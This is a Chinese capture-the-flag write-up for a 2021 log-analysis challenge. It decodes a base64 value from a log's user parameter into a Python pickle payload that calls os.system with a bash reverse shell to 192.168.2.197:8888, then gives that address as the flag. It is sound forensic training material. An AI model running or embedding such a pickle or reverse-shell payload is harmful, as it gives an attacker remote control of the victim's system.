[陇剑杯 2021]简单日志分析(问3)

1. 提取最后一条 base64

最后一条日志的 user 参数值为:

text

复制代码
STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=

2. Base64 解码

python

复制代码
import base64

payload = "STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4="
decoded = base64.b64decode(payload)
print(decoded)

输出:

text

复制代码
b'I\x0c0\x0c0S\'bash -i >& /dev/tcp/192.168.2.197/8888 0>&1\'\nw1\n0(g0\nlp2\n0(I0\ntp3\n0(g3\nI0\ndp4\n0cos\nsystem\np5\n0g5\n(g1\ntR.'

可以看到里面明明白白地出现了:

text

复制代码
bash -i >& /dev/tcp/192.168.2.197/8888 0>&1

3. 结论

反弹 shell 的目标 IP 和端口是:

text

复制代码
192.168.2.197:8888

最终答案:

text

复制代码
192.168.2.197:8888
NSSCTF{192.168.2.197:8888}
相关推荐
王嘉俊9253 小时前
Django 入门:快速构建 Python Web 应用的强大框架
前端·后端·python·django·web·开发·入门
Akshsjsjenjd3 小时前
Nginx 访问控制、用户认证、HTTPS配置实操手册
nginx·https·github
IT_陈寒3 小时前
Redis性能翻倍的5个冷门技巧,90%的开发者从不知道第3点!
前端·人工智能·后端
WebGIS开发3 小时前
新中地三维GIS开发智慧城市效果和应用场景
前端·人工智能·gis·智慧城市·webgis
鱼樱前端4 小时前
uni-app快速入门章法(一)
前端·uni-app
uhakadotcom4 小时前
入门教程:常用的 Python 第三方库:python-logstash
后端·面试·github
zhangxuyu11185 小时前
flex布局学习记录
前端·css·学习
掘金一周5 小时前
🍏让前端去做 iPhone 的液态玻璃❓ | 掘金一周 10.2
前端·人工智能·后端
Keepreal4965 小时前
谈谈对javascript原型链的理解以及原型链的作用
前端·javascript